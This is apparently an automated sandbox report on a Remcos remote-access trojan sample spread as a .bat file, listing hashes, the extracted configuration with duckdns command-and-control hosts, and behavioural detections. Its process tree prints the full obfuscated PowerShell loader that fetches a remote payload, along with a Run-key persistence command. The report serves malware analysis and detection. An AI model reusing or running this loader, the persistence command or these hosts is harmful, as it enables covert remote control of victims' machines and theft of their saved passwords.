Overview
overview
10Static
static
131032025_1...at.zip
windows11-21h2-x64
31032025_1...at.zip
windows10-2004-x64
31032025_1...at.zip
windows10-ltsc_2021-x64
31032025_1...at.zip
windows11-21h2-x64
31032025_1...at.zip
android-9-x86
31032025_1...at.zip
android-13-x64
31032025_1...at.zip
macos-10.15-amd64
31032025_1...at.zip
ubuntu-18.04-amd64
31032025_1...at.zip
debian-9-armhf
31032025_1...at.zip
debian-9-mips
31032025_1...at.zip
debian-9-mipsel
2025.02.22...��.bat
windows10-2004-x64
102025.02.22...��.bat
windows10-2004-x64
102025.02.22...��.bat
windows10-ltsc_2021-x64
82025.02.22...��.bat
windows11-21h2-x64
102025.02.22...��.bat
android-9-x86
2025.02.22...��.bat
android-13-x64
2025.02.22...��.bat
macos-10.15-amd64
2025.02.22...��.bat
ubuntu-18.04-amd64
2025.02.22...��.bat
debian-9-armhf
2025.02.22...��.bat
debian-9-mips
2025.02.22...��.bat
debian-9-mipsel
Analysis
-
max time kernel
118s -
max time network
108s -
platform
windows11-21h2_x64 -
resource
win11-20250314-en -
resource tags
arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system -
submitted
31/03/2025, 15:20
Static task
static1
Behavioral task
behavioral1
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win11-20250313-en
Behavioral task
behavioral2
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral4
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win11-20250314-en
Behavioral task
behavioral5
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
android-x86-arm-20240910-en
Behavioral task
behavioral6
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral7
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
macos-20241106-en
Behavioral task
behavioral8
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral9
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral10
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral11
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral12
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10v2004-20250313-en
Behavioral task
behavioral13
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10v2004-20250314-en
Behavioral task
behavioral14
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral15
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win11-20250314-en
Behavioral task
behavioral16
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
android-x86-arm-20240910-en
Behavioral task
behavioral17
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral18
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
macos-20241101-en
Behavioral task
behavioral19
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral20
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral21
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral22
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-mipsel-20240729-en
General
-
Target
2025.02.222 n.ts შპს განსხვავებული.bat
-
Size
3KB
-
MD5
1db91aace1aac9f3e07036598aeaa98b
-
SHA1
c8f4074759f0ea7eef262c36163db7868c6503f7
-
SHA256
3d5032b506dcc1626efecbebb7f97ff8539200b6090fffa96ef6090d7082d249
-
SHA512
9f5e409c1d48c3fddb13085949a4141962000fcf45614cf6feff841d6331adec33cfd95d9836761436e6fed4b87136d730396da9ac89c065fe76f264b5d98de4
Malware Config
Extracted
remcos
Sending
jamourtg6hansit1.duckdns.org:3980
jamourtg6hansit1.duckdns.org:3981
jamourtg6hansit2.duckdns.org:3980
jamourtg6hansit3.duckdns.org:3980
jamourtg6hansit4.duckdns.org:3980
jamourtg6hansit5.duckdns.org:3980
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
hjlbtisot.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
kmportsrgsd-ZX0BIK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 4 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral15/memory/2112-71-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral15/memory/5996-76-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral15/memory/2112-73-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral15/memory/5340-82-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral15/memory/5996-76-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral15/memory/2112-71-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView behavioral15/memory/2112-73-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 7 IoCs
flow pid Process 2 3324 powershell.exe 4 3596 msiexec.exe 5 3596 msiexec.exe 6 3596 msiexec.exe 7 3596 msiexec.exe 8 3596 msiexec.exe 9 3596 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3324 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts recover.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Entrochus = "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\\Software\\Forlydes\\').GetValue('coxswains');%Reimburses% ($Frynsernes143)" reg.exe -
pid Process 5040 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3596 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5040 powershell.exe 3596 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3596 set thread context of 2112 3596 msiexec.exe 88 PID 3596 set thread context of 5996 3596 msiexec.exe 89 PID 3596 set thread context of 5340 3596 msiexec.exe 90 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3324 powershell.exe 3324 powershell.exe 5040 powershell.exe 5040 powershell.exe 5040 powershell.exe 2112 recover.exe 2112 recover.exe 2112 recover.exe 2112 recover.exe 5340 recover.exe 5340 recover.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 5040 powershell.exe 3596 msiexec.exe 3596 msiexec.exe 3596 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 5340 recover.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3596 msiexec.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 5296 wrote to memory of 3324 5296 cmd.exe 79 PID 5296 wrote to memory of 3324 5296 cmd.exe 79 PID 5040 wrote to memory of 3596 5040 powershell.exe 84 PID 5040 wrote to memory of 3596 5040 powershell.exe 84 PID 5040 wrote to memory of 3596 5040 powershell.exe 84 PID 5040 wrote to memory of 3596 5040 powershell.exe 84 PID 3596 wrote to memory of 1060 3596 msiexec.exe 85 PID 3596 wrote to memory of 1060 3596 msiexec.exe 85 PID 3596 wrote to memory of 1060 3596 msiexec.exe 85 PID 1060 wrote to memory of 4716 1060 cmd.exe 87 PID 1060 wrote to memory of 4716 1060 cmd.exe 87 PID 1060 wrote to memory of 4716 1060 cmd.exe 87 PID 3596 wrote to memory of 2112 3596 msiexec.exe 88 PID 3596 wrote to memory of 2112 3596 msiexec.exe 88 PID 3596 wrote to memory of 2112 3596 msiexec.exe 88 PID 3596 wrote to memory of 2112 3596 msiexec.exe 88 PID 3596 wrote to memory of 5996 3596 msiexec.exe 89 PID 3596 wrote to memory of 5996 3596 msiexec.exe 89 PID 3596 wrote to memory of 5996 3596 msiexec.exe 89 PID 3596 wrote to memory of 5996 3596 msiexec.exe 89 PID 3596 wrote to memory of 5340 3596 msiexec.exe 90 PID 3596 wrote to memory of 5340 3596 msiexec.exe 90 PID 3596 wrote to memory of 5340 3596 msiexec.exe 90 PID 3596 wrote to memory of 5340 3596 msiexec.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2025.02.222 n.ts შპს განსხვავებული.bat" bcdedit /c set delete /r readonly /f force /t 21⤵
- Suspicious use of WriteProcessMemory
PID:5296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4716
-
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\unwdrepjivo"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2112
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\ehjwswzdwehmny"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:5996
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\pjpotokekmzrpeqdt"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5340
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52ddea6bf517ba576347c8919ef1a3287
SHA1240e4e3792f86696d393ab8533f45c2d85d9bd5c
SHA256640a03da4021a7c20294c933be45acd76de6b463590742f32f65c9caee9a9852
SHA5127502603640eae85dc32b92ecf5cc19c87094d15c7f0f6daa47b68b89bbe315b0bb89268dac6d280fe37dfb8d096b0cf730d678497cdf0fe874e61b8e54a801af
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
561KB
MD5fe566224082e2fd8765e323a73a2d9f2
SHA186a2fd4c14b36fc636efdfa6713ba3a3ae149937
SHA25652de732643d3945e5e12154ea8dd7f8643419e5432b8ee9059c32c250532f772
SHA5122c7c37d9c1cebc9915b082e0db60a41b8afffba7d6e35c115fa2ee98a0ac3f7fc28b5e55f019da852d4a7597644f0587fa370233f59101d37e7db303f06c4886